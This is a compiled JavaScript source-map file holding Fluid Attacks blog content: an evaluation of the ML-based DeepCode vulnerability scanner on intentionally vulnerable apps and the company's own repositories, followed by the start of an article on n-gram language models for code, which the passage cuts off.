{
  "version": 3,
  "sources": ["ssg:https://framerusercontent.com/modules/xkgOTPH3D819XQA1Lv94/uRvmkcZwA2es6kIfLCcW/WJBZI1Ghk-76.js"],
  "sourcesContent": ["import{jsx as e,jsxs as t}from\"react/jsx-runtime\";import{ComponentPresetsConsumer as n,Link as o}from\"framer\";import{motion as i}from\"framer-motion\";import*as a from\"react\";import s from\"https://framerusercontent.com/modules/pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js\";export const richText=/*#__PURE__*/t(a.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"In our \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/tags/machine-learning/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Machine Learning (ML) for secure code series\"})}),\" the \",/*#__PURE__*/e(\"em\",{children:\"mantra\"}),\" has always been the same: to figure out how to leverage the power of ML to detect security vulnerabilities in source code, regardless of the \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/crash-course-machine-learning/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"technique\"})}),\", be it \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/deep-hacking/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"deep learning\"})}),\", \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/exploit-code-graph/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"graph mining\"})}),\", \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/natural-code/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"natural language processing\"})}),\", or \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/anomaly-serial-killer-doll/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"anomaly detection\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"In this article we present a new player in the field, \",/*#__PURE__*/e(o,{href:\"https://www.deepcode.ai/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"DeepCode\"})}),\", a system that has exactly this purpose, combining ML with data flow analysis, namely in the form of taint analysis.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Taint analysis can come in dynamic and static forms and can be performed at the source and binary levels, but either way, the goal is the same. Start by looking at where input comes from and is controlled by the user, for example, a web app search field. These are named \",/*#__PURE__*/e(\"em\",{children:\"sources\"}),\" in this context. Then, continue to follow the thread to where it gets used by the system in a security-critical fashion, as in using that info to query a database, to continue with the previous example. These points are called \",/*#__PURE__*/e(\"em\",{children:\"sinks\"}),\".\"]}),/*#__PURE__*/e(\"img\",{alt:\"Taint analysis\",className:\"framer-image\",height:\"400\",src:\"https://framerusercontent.com/images/mJ6Bbf7f17wG50dSuVKGjuGGSU.png\",srcSet:\"https://framerusercontent.com/images/mJ6Bbf7f17wG50dSuVKGjuGGSU.png?scale-down-to=512 512w,https://framerusercontent.com/images/mJ6Bbf7f17wG50dSuVKGjuGGSU.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/mJ6Bbf7f17wG50dSuVKGjuGGSU.png 1920w\",style:{aspectRatio:\"1920 / 800\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Taint analysis diagram via \",/*#__PURE__*/e(o,{href:\"https://www.csa.iisc.ac.in/~vg/teaching/E0-256/slides/TaintAnalysis.pdf\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Coseinc\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"Along the way in the case of a secure application, data should encounter significant input sanitization or validation. These are called \",/*#__PURE__*/e(\"em\",{children:\"sanitizers\"}),\" in the taint analysis context. However, frequently this does not happen, and thus vulnerabilities arise.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Traditional taint analysis tools, however, usually present high false positive rates, as is the case with \",/*#__PURE__*/e(o,{href:\"https://github.com/openstack/bandit\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Bandit\"})}),\" and \",/*#__PURE__*/e(o,{href:\"https://github.com/python-security/pyt\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Pyt\"})}),\" (see some critique \",/*#__PURE__*/e(o,{href:\"https://smarketshq.com/avoiding-injection-with-taint-analysis-1e55429e207b\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"here\"})}),\").\"]}),/*#__PURE__*/t(\"p\",{children:[\"DeepCode\u2019s purpose is to remove minor difficulties these taint analysis tools may have. DeepCode does this by learning from the vast quantity of freely-available, high-quality code in open repositories such as \",/*#__PURE__*/e(o,{href:\"https://github.com/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Github\"})}),', a circumstance then dubbed \"Big Code\". The tool is easy and free to use. This provides the added advantage of also learning from the user\u2019s code, the suggestions made by the tool, and the user\u2019s feedback (accepting suggestions, ',/*#__PURE__*/e(\"em\",{children:\"how\"}),\" to fix them, etc).\"]}),/*#__PURE__*/e(\"p\",{children:\"Another problem with taint analysis is that sources, sinks, and sanitizers need to be specified by hand, which is extremely impractical for large-scale projects. This is another area where ML helps DeepCode, but how is that done?\"}),/*#__PURE__*/t(\"p\",{children:[\"DeepCode has been called \",/*#__PURE__*/e(o,{href:\"https://app.grammarly.com/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Grammarly\"})}),\" for code. It claims to be 90% accurate, and that it understands the \",/*#__PURE__*/e(\"em\",{children:\"intent\"}),\" behind the code. It also claims to find twice as many issues as other tools, even some critical ones (XSS, SQL injection and path traversal, etc.) which is something typical static analysis tools do not. Moreover, it claims to be easy to use, requiring no configuration.\"]}),/*#__PURE__*/t(\"p\",{children:[\"The tool is friendly. You need only point it to your repository and give the appropriate permissions, and then it will show a dashboard with the issues found. Here is one for \",/*#__PURE__*/e(o,{href:\"https://github.com/eclipse/che\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Eclipse Che Cloud IDE\"})}),\":\"]}),/*#__PURE__*/e(\"img\",{alt:\"security issues\",className:\"framer-image\",height:\"855\",src:\"https://framerusercontent.com/images/YZfAB0yXPAWL14MJ7AR7WQCJjbI.png\",srcSet:\"https://framerusercontent.com/images/YZfAB0yXPAWL14MJ7AR7WQCJjbI.png?scale-down-to=512 512w,https://framerusercontent.com/images/YZfAB0yXPAWL14MJ7AR7WQCJjbI.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/YZfAB0yXPAWL14MJ7AR7WQCJjbI.png 1920w\",style:{aspectRatio:\"1920 / 1711\"},width:\"960\"}),/*#__PURE__*/t(\"h6\",{children:[\"Security issues dashboard for Eclipse Che, adapted from \",/*#__PURE__*/e(o,{href:\"https://www.deepcode.ai/app/gh/eclipse/che/5be0e29f11fdef73ed4a3da5fe61e3cc0eb3e875/_/dashboard/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"DeepCode demo\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:['Here we see three instances of a possible path traversal vulnerability. In the full dashboard, we also see how they report an insecure HTTPS channel, a Server Side Request Forgery (SSRF), a Cross Site Scripting (XSS) vulnerability, and a header that leaks technical information (X-Powered-By). And that\u2019s only the issues tagged as \"security\". There are also API misuse issues, v.g. using ',/*#__PURE__*/e(\"code\",{children:\"Thread.run()\"}),\" instead of \",/*#__PURE__*/e(\"code\",{children:\"Thread.start()\"}),\", general bugs or defects, and now they even throw lint tools results, which deal with formatting and presentation issues. Oh, yes, and every issue comes with a possible fix you might implement right away.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Quite nice, from the point of view of contributing a new vulnerability report to a project, with no false positives. However when the aim is to find \",/*#__PURE__*/e(\"em\",{children:\"all\"}),\" vulnerabilities, one cannot help but raise the question: is that all? Are these \",/*#__PURE__*/e(\"em\",{children:\"all\"}),\" the security vulnerabilities in a project with more than \",/*#__PURE__*/e(o,{href:\"https://api.codetabs.com/v1/loc?github=eclipse/che\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"300,000\"})}),\" lines of code?\"]}),/*#__PURE__*/t(\"p\",{children:[\"Let us take one of the many Vulnerable by Design (VbD) applications we use for training purposes in our \",/*#__PURE__*/e(o,{href:\"https://autonomicmind.com/challenges/sites-ranking-vbd/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"challenges site\"})}),\", and see how many vulnerabilities come up by running DeepCode on them. By the way, they currently support Javascript, TypeScript and Java, besides the original Python. That leaves us with two apps to try: the \",/*#__PURE__*/e(o,{href:\"https://github.com/appsecco/dvna\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Damn Vulnerable NodeJS Application\"})}),\" (DVNA) and \",/*#__PURE__*/e(o,{href:\"https://github.com/stamparm/DSVW\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Damn Small Vulnerable Web\"})}),\" (DSVW), since most VbD apps are built with PHP.\"]}),/*#__PURE__*/e(\"p\",{children:\"I forked both of these on Github, signed up for a DeepCode account, and let it run. For DSVW, which is a single Python file under 100 lines of code, but still ridden with vulnerabilities, DeepCode reports zero issues. Perhaps it does not work as well on such tiny projects.\"}),/*#__PURE__*/e(\"img\",{alt:\"Zero issues\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/WgCIgJ4XrYdoVu0ttpox4fMUx4.png\",srcSet:\"https://framerusercontent.com/images/WgCIgJ4XrYdoVu0ttpox4fMUx4.png?scale-down-to=512 512w,https://framerusercontent.com/images/WgCIgJ4XrYdoVu0ttpox4fMUx4.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/WgCIgJ4XrYdoVu0ttpox4fMUx4.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Zero issues in DSVW.\"}),/*#__PURE__*/t(\"p\",{children:[\"This is, to say the least, disappointing, since that DSVW has no less than 26 different \",/*#__PURE__*/e(\"em\",{children:\"kinds\"}),\" of vulnerabilities, as per its README. In \",/*#__PURE__*/e(o,{href:\"https://gitlab.com/fluidattacks/writeups/tree/master/vbd/dsvw/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Writeups\"})}),\", three of those have been manually explored and exploited.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Maybe it\u2019s a problem with having so few lines of code, maybe it\u2019s a Python thing, so let\u2019s try the other one: DVNA, built with NodeJS with the specific purpose of demonstrating the \",/*#__PURE__*/e(o,{href:\"https://www.owasp.org/index.php/Top_10-2017_Top_10\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"OWASP Top 10 vulnerabilities\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"This time around, DeepCode found 9 issues. Of those, take out the 3 which come from \",/*#__PURE__*/e(\"code\",{children:\"ESLint\"}),', and let\u2019s consider the other 6; 2 are API misuses, which are basically \"use arrows instead of functions\" and 4 are security vulnerabilities, and pretty serious ones at that:']}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Code Injection via \",/*#__PURE__*/e(\"code\",{children:\"eval\"}),\" function in calculator module. Not the same one as in the authors' security guide. Also not yet reported in \",/*#__PURE__*/e(o,{href:\"https://gitlab.com/fluidattacks/writeups/tree/master/vbd/dvna/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Writeups\"})}),\" This should be researched further.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"SQL injection. As per \",/*#__PURE__*/e(o,{href:\"https://github.com/appsecco/dvna/blob/master/docs/solution/a1-injection.md\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"security guide\"})}),\" and \",/*#__PURE__*/e(o,{href:\"https://gitlab.com/fluidattacks/writeups/blob/master/vbd/dvna/0564-sql-injection/jicardona.feature\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Writeups\"})}),\".\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Open Redirect. Also in \",/*#__PURE__*/e(o,{href:\"https://github.com/appsecco/dvna/blob/master/docs/solution/ax-unvalidated-redirects-and-forwards.md\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"the security guide\"})}),\" and \",/*#__PURE__*/e(o,{href:\"https://gitlab.com/fluidattacks/writeups/blob/master/vbd/dvna/0601-unvalidated-redirects/simongomez95.feature\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Writeups\"})}),\".\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Technical information leakage via the X-Powered-By header, as in \",/*#__PURE__*/e(\"code\",{children:\"Che\"}),\".\"]})})]}),/*#__PURE__*/t(\"p\",{children:[\"So, altogether, 3 noteworthy security vulnerabilities, in a NodeJS application with more than 7,500 lines of code. In \",/*#__PURE__*/e(o,{href:\"https://gitlab.com/fluidattacks/writeups\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Writeups\"})}),\", at least 29 different vulnerabilities have been reported in DVNA. You can see a \",/*#__PURE__*/e(o,{href:\"https://gitlab.com/fluidattacks/writeups/blob/master/vbd/dvna/results-toe.md\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"report\"})}),\" on manual testing vs the LGTM \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/oracle-code/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"code-as-data\"})}),\" tool in there, too, where it is quite clear that tool misses most of the vulnerabilities as well.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Now for a more realistic test, let\u2019s try running DeepCode on some of our own repos, namely, Integrates, our platform for vulnerability centralization and management and \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.gitlab.io/asserts/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"asserts\"})}),\", our vulnerability automation framework. Both are \",/*#__PURE__*/e(o,{href:\"https://gitlab.com/fluidattacks\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"open-source\"})}),\", written in Python, and actively developed. As before, the vast majority of issues found by DeepCode are of the lint and API usage kind.\"]}),/*#__PURE__*/e(\"img\",{alt:\"Integrates\",className:\"framer-image\",height:\"772\",src:\"https://framerusercontent.com/images/TtGRM4TVF1bgBaIan3IvnHLJxA.png\",srcSet:\"https://framerusercontent.com/images/TtGRM4TVF1bgBaIan3IvnHLJxA.png?scale-down-to=512 512w,https://framerusercontent.com/images/TtGRM4TVF1bgBaIan3IvnHLJxA.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/TtGRM4TVF1bgBaIan3IvnHLJxA.png 1920w\",style:{aspectRatio:\"1920 / 1545\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Integrates Dashboard.\"}),/*#__PURE__*/t(\"p\",{children:[\"In Integrates, the platform that our clients use for \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/cybersecurity-essentials/what-is-vulnerability-management/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"vulnerability management\"})}),\", we see a possible command injection in the spreadsheet report generation function. However, this input is not controllable by the user, so this does not pose a real threat at the moment:\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Command Injection in Integrates?\"})}),/*#__PURE__*/e(\"img\",{alt:\"Command injection\",className:\"framer-image\",height:\"225\",src:\"https://framerusercontent.com/images/VxdEe6vZL6ZMJmm4d0uvsvtVU.png\",srcSet:\"https://framerusercontent.com/images/VxdEe6vZL6ZMJmm4d0uvsvtVU.png?scale-down-to=512 512w,https://framerusercontent.com/images/VxdEe6vZL6ZMJmm4d0uvsvtVU.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/VxdEe6vZL6ZMJmm4d0uvsvtVU.png 1919w\",style:{aspectRatio:\"1919 / 450\"},width:\"959\"}),/*#__PURE__*/t(\"p\",{children:[\"However, the suggestion to sanitize the input via \",/*#__PURE__*/e(\"code\",{children:\"subprocess.call()\"}),\" is not bad. Who knows if Integrates will later have user-configurable passwords for reports, or a \",/*#__PURE__*/e(\"em\",{children:\"different\"}),\" vulnerability enables an attacker to change this parameter.\"]}),/*#__PURE__*/e(\"p\",{children:\"The other security issue is in the PDF report generation, this time identified as Path traversal. Again, probably difficult to exploit, but should be sanitized anyway.\"}),/*#__PURE__*/e(\"img\",{alt:\"Asserts\",className:\"framer-image\",height:\"999\",src:\"https://framerusercontent.com/images/beqjPOZFVjnP78IpVprLu80BHPo.png\",srcSet:\"https://framerusercontent.com/images/beqjPOZFVjnP78IpVprLu80BHPo.png?scale-down-to=1024 984w,https://framerusercontent.com/images/beqjPOZFVjnP78IpVprLu80BHPo.png 1920w\",style:{aspectRatio:\"1920 / 1998\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"In \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.gitlab.io/asserts/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Asserts\"})}),\", however, the 15 issues found by DeepCode are less worrisome, for two reasons:\"]}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(o,{href:\"https://fluidattacks.gitlab.io/asserts/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Asserts\"})}),\" is not a client-server application, but an API that runs locally.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Most of the 15 issues are several instances of SSRF, when \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.gitlab.io/asserts/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Asserts\"})}),\" makes HTTP requests via \",/*#__PURE__*/e(o,{href:\"https://2.python-requests.org/en/master/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Requests\"})}),\", generally to client\u2019s ToEs as one would in a browser.\"]})})]}),/*#__PURE__*/e(\"p\",{children:\"Of course, all the issues detected by DeepCode will be taken care of.\"}),/*#__PURE__*/t(\"p\",{children:[\"Once again, this confirms our other \",/*#__PURE__*/e(\"em\",{children:\"mantra\"}),\" we have held in this Machine Learning (ML) series and also \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/replaced-machines/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"elsewhere\"})}),\" on our website. While automated tools, even ML-powered ones, may have the potential to do what a human could not do in terms of repetitions and scalability, as of yet, they do not have the malice or creativity which humans have in finding critical and interesting security vulnerabilities.\"]}),/*#__PURE__*/e(\"h2\",{children:\"References\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"V. Raychev. 2018. \",/*#__PURE__*/e(o,{href:\"https://medium.com/deepcode-ai/deepcode-releases-the-first-practical-anomaly-bug-detector-32bebc8cdf57\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"DeepCode releases the first practical anomaly bug detector\"})}),\".\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"V. Chibotaru. 2019. Meet the tool that automatically infers security vulnerabilities in Python code. \",/*#__PURE__*/e(o,{href:\"https://tinyurl.com/y6tpoxzj\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Hackernoon\"})}),\".\"]})})]})]});export const richText1=/*#__PURE__*/t(a.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"Our return to the \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/tags/machine-learning/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Machine Learning (\"})}),/*#__PURE__*/e(\"code\",{children:/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/tags/machine-learning/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"ML\"})})}),/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/tags/machine-learning/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\") for secure code series\"})}),\" is \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/binary-learning/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"a bit of a digression\"})}),\", but one too interesting to resist. It is not too far a digression though, because the \",/*#__PURE__*/e(o,{href:\"https://en.wikipedia.org/wiki/Natural_language_processing\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Natural Language Processing\"})}),\" (\",/*#__PURE__*/e(\"code\",{children:\"NLP\"}),\") field is also part of what \",/*#__PURE__*/e(o,{href:\"https://en.wikipedia.org/wiki/AI_effect\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"is currently\"})}),\" considered to be \",/*#__PURE__*/e(o,{href:\"https://en.wikipedia.org/wiki/Artificial_intelligence\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Artificial Intelligence\"})}),\". And, as we will state in this article, it has great potential for applications in information security.\"]}),/*#__PURE__*/t(\"p\",{children:['Basically, every cell phone currently in use employs a predictive keyboard. Besides completing words for you based on the first few letters, they are also able to suggest entire words after you have written some. And some of these combinations just make sense because they are used more frequently in common phrasing. Certainly, \"peanut\" is more likely to be followed by \"butter\" than \"wrench\". Extending that idea to more words, such as \"peanut butter and jelly\" we see they are definitely more likely to be followed by \"sandwich\" than \"salad\". The same holds true for \"star\" followed by \"trek\", as seen in this demo for the ',/*#__PURE__*/e(o,{href:\"https://proandroiddev.com/android-predictive-keyboard-e6c9df01e527\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Android Predictive Keyboard\"})}),\":\"]}),/*#__PURE__*/e(\"img\",{alt:\"n-gram\",className:\"framer-image\",height:\"240\",src:\"https://framerusercontent.com/images/UeoaDo03XCDpwUhJefmOjBaMF0c.gif\",style:{aspectRatio:\"270 / 480\"},width:\"135\"}),/*#__PURE__*/e(\"h6\",{children:\"An n-gram based predictive keyboard at work.\"}),/*#__PURE__*/t(\"p\",{children:[\"This is the basic idea behind \",/*#__PURE__*/e(\"em\",{children:\"n\"}),\"-gram analysis, a technique we have mentioned before in passing. It has been applied to a couple of the \",/*#__PURE__*/e(\"code\",{children:\"ML\"}),\"-powered vulnerability detectors we have discussed, most notably by the binary static analysis tool \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/binary-learning/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"VDiscover\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"An \",/*#__PURE__*/e(\"em\",{children:\"n\"}),\"-gram is simply a sequence of \",/*#__PURE__*/e(\"em\",{children:\"n\"}),\" consecutive words occurring in a piece of real text, which we use as a basis for training. This text is called a \",/*#__PURE__*/e(\"em\",{children:\"corpus\"}),\" in the Natural Language Processing context. This training essentially consists of:\"]}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Extracting all the possible \",/*#__PURE__*/e(\"em\",{children:\"n\"}),'-grams in the corpus taking punctuation into account, so that \"now. But before\" will not be considered a valid 3-gram.']})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Counting the occurrence of each \",/*#__PURE__*/e(\"em\",{children:\"n\"}),\"-gram vs the total, i.e., finding the relative frequency of each.\"]})})]}),/*#__PURE__*/e(\"p\",{children:'That\u2019s it! Now if you see \"peanut butter and jelly\", we look at all the 5-grams that contain this 4-gram, and see which one has the highest relative frequency. Suppose the \"peanut butter and jelly sandwich\" occurs the most in our training corpus. Then the first suggested word to come after the given 4 is, of course, \"sandwich\", rather than \"wrench\".'}),/*#__PURE__*/e(\"p\",{children:'If the corpus is good enough regarding the context in which such words appear, then the suggestions should be just as good. The quality of results, and hence the accuracy of our classifier, is highly dependent on the training corpus\\' quality. Cell phone predictive keyboards exploit this fact by learning from your typing habits. Depending on who you are \"machine\" might be more likely followed by \"shop\", \"head\" or \"learning\".'}),/*#__PURE__*/t(\"p\",{children:[\"If all this can be done on \",/*#__PURE__*/e(\"em\",{children:\"natural\"}),\" language, which has all sorts of ambiguities, mistakes in the training corpus, irregularities, etc, imagine what could be done if we applied this same idea to code, which is highly regular, ordered and syntactically strict? The possible applications are promising.\"]}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Automatically complete code like the text 